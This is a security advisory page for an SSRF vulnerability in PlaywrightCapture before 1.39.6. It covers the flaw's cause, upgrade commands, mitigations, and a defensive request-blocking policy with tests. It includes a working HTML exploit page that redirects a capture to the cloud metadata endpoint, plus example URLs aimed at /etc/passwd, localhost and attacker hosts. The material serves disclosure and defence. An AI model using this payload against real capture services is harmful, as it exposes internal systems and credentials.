The vulnerability arises because PlaywrightCapture does not sufficiently restrict navigations and resource requests initiated by the captured web pages. An attacker who controls the content of a page (for example, by supplying a malicious URL) can abuse browser-side redirections: with a mechanism such as `window.location.href`, the attacker forces the capture process to navigate to a `file://` URL, for example `file:///etc/passwd`, to read local system files. The attacker can likewise cause the capture process to send requests to internal network addresses such as `http://localhost:8080/admin` or `http://192.168.1.1`. The PlaywrightCapture engine, acting as a client, follows these redirects and makes the secondary request. Crucially, the original validation logic only checked the initially submitted URL, not the subsequent ones. This allows a Server-Side Request Forgery (SSRF) attack in which an external attacker makes the internal capture service interact with, and potentially extract data from, internal services, cloud metadata endpoints, or the local filesystem. The responses from these internal or local resources can then leak back to the attacker through the capture artifacts, such as screenshots of the rendered page, saved HTML content, or debug logs.

The patch addresses this by introducing request routing checks that block any secondary request targeting local files, non-global IP addresses (private, loopback, or link-local ranges), or `.local` domains when the `only_global_lookup` option is enabled, while still allowing the originally intended capture URL.
DailyCVE Form
Platform: PlaywrightCapture
Version: <1.39.6
Vulnerability: SSRF (Server-Side)
Severity: Medium
Date: 2026-04-30
Prediction: 2026-05-01
What Undercode Say:
Administrators should update to the patched release immediately. Use the following commands to verify the installed version and upgrade the package.
Check the currently installed version:

```shell
pip show playwrightcapture | grep Version
```

Upgrade to the patched version (1.39.6 or later); the version specifier is quoted so the shell does not treat `>` as a redirection:

```shell
pip install --upgrade "playwrightcapture>=1.39.6"
```
The root cause is the failure to validate redirect targets. The following simplified Python example demonstrates the insecure pre-patch behavior, in which there is no route validation on the redirected URL:

```python
# Vulnerable pre-1.39.6 behavior (simplified, for demonstration only)
from playwrightcapture import Capture

capture = Capture()

# Attacker-controlled page that redirects to localhost via window.location.href
malicious_url = "https://attacker.com/redirect_to_localhost.html"

# Pre-patch, only malicious_url is validated; the redirect target is not,
# so the engine would go on to fetch http://localhost:8080
result = capture.run(malicious_url)
```
Exploit:
An attacker can host a simple HTML page at a URL provided to the PlaywrightCapture service. The page contains a client-side redirection:
```html
<!-- save as exploit.html and serve via any HTTP server -->
<!DOCTYPE html>
<html>
  <head>
    <script>
      // Redirect to internal service (e.g., cloud metadata endpoint)
      window.location.href = "http://169.254.169.254/latest/meta-data/";
    </script>
  </head>
  <body>Redirecting...</body>
</html>
```
When PlaywrightCapture processes this URL, the browser inside the capture environment follows the redirect and makes a request to the internal IP address. If the capture service returns the content as part of a screenshot or log, the attacker can retrieve sensitive information.
Protection from this CVE
The primary protection is to upgrade to PlaywrightCapture version 1.39.6 or later, which includes the request routing checks. If upgrading is not immediately possible, mitigate the risk by:
– Avoiding the processing of untrusted URLs.
– Enabling the `only_global_lookup` flag in the capture configuration (this is the default in patched versions).
– Implementing a strict outbound network policy for the capture environment to block all requests to private IP ranges and `file://` URIs.
– Disabling, or at least closely monitoring, the saving of verbose capture artifacts (screenshots, logs, HTML output) that could leak internal data.
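As an added, defender-side illustration of the request routing checks the patch introduces (and of the `only_global_lookup` mitigation above), the following Python policy is not PlaywrightCapture's own code. It applies the rules described in this advisory to every secondary request: the originally submitted capture URL passes, `file://` is refused, `.local` names are refused, and any host whose literal or resolved address is non-global (private, loopback, link-local) is refused. It assumes Playwright's sync `Route` interface (`route.request.url`, `route.abort()`, `route.continue_()`), uses a constructed DNS table so it runs offline, and, as a stricter choice than the page's wording, blocks `file://` regardless of the flag.

```python
import ipaddress
import socket
from types import SimpleNamespace
from urllib.parse import urlsplit


def resolve_host(host):
    """Default resolver: every address the OS returns for host; empty on failure (fail closed)."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return sorted({info[4][0].split("%")[0] for info in infos})


def _is_global_address(ip):
    """True only outside private, loopback, link-local and other reserved ranges.
    IPv4-mapped IPv6 literals (::ffff:a.b.c.d) are unwrapped so the IPv4 rules apply."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip.is_global


def is_request_allowed(url, capture_url, only_global_lookup=True, resolve=resolve_host):
    """Return (allowed, reason) for one request made by the captured page. The originally
    submitted capture URL is assumed to have been validated before the capture started."""
    if url == capture_url:
        return True, "original capture URL"
    parts = urlsplit(url)
    if parts.scheme.lower() == "file":  # assumption: refused even when the flag is off
        return False, "file:// is never allowed as a secondary request"
    if not only_global_lookup:
        return True, "only_global_lookup disabled"
    host = parts.hostname
    if host is None:
        return True, "no network host (e.g. about:blank or data: URLs)"
    host = host.rstrip(".").lower()
    if host.endswith(".local"):
        return False, ".local domain"
    try:
        addresses = [ipaddress.ip_address(host)]  # IP literal, no DNS needed
    except ValueError:
        addresses = [ipaddress.ip_address(a) for a in resolve(host)]
    if not addresses:
        return False, "host did not resolve"
    for ip in addresses:  # a single non-global answer is enough to block
        if not _is_global_address(ip):
            return False, f"non-global address {ip}"
    return True, "global address"


def make_route_handler(capture_url, only_global_lookup=True, resolve=resolve_host):
    """Build a callback for Playwright's sync API: page.route("**/*", handler).
    With the async API the abort()/continue_() calls would be awaited."""
    def handler(route):
        allowed, reason = is_request_allowed(
            route.request.url, capture_url, only_global_lookup, resolve)
        if allowed:
            route.continue_()
        else:
            route.abort()
        return allowed, reason
    return handler


class FakeRoute:
    """Constructed stand-in for a Playwright Route so the policy can be exercised offline."""
    def __init__(self, url):
        self.request = SimpleNamespace(url=url)
        self.action = None

    def abort(self):
        self.action = "abort"

    def continue_(self):
        self.action = "continue"


# Constructed DNS table (no real lookups); the public addresses are placeholders.
FAKE_DNS = {
    "localhost": ["127.0.0.1", "::1"],
    "cdn.example.net": ["1.1.1.1"],
}


def fake_resolve(host):
    return FAKE_DNS.get(host, [])


def demo():
    """Run the handler over the kinds of secondary requests this advisory describes."""
    capture_url = "https://attacker.example/redirect.html"
    handler = make_route_handler(capture_url, resolve=fake_resolve)
    decisions = {}
    for url in [
        capture_url,
        "file:///etc/passwd",
        "http://localhost:8080/admin",
        "http://192.168.1.1/",
        "http://169.254.169.254/latest/meta-data/",
        "http://[::ffff:127.0.0.1]/",
        "http://printer.local/",
        "https://cdn.example.net/app.js",
    ]:
        route = FakeRoute(url)
        _, reason = handler(route)
        decisions[url] = (route.action, reason)
    return decisions
```

In a real capture the handler is registered with `page.route("**/*", make_route_handler(url))` before `page.goto(url)`, so redirects triggered by `window.location.href` are intercepted like any other request. Two design points matter for this class of bug: the check runs on resolved addresses rather than on hostnames, so a name such as `localhost` or an internal DNS record that points at a private range is caught even though it is not an IP literal, and a resolver failure drops the request instead of letting it through.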
Impact
A successful exploit allows a remote attacker to bypass network restrictions and perform Server-Side Request Forgery (SSRF) attacks on the internal PlaywrightCapture service. The attacker could:
– Read arbitrary local files from the capture server, such as /etc/passwd, configuration files, source code, or data files.
– Probe and interact with internal services (e.g., internal HTTP APIs, cloud metadata endpoints, databases) that are not accessible from the internet. This could lead to further compromise of the internal infrastructure.
– Leak sensitive information obtained from local files or internal services through the capture outputs, including screenshots, saved page source, or logs.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

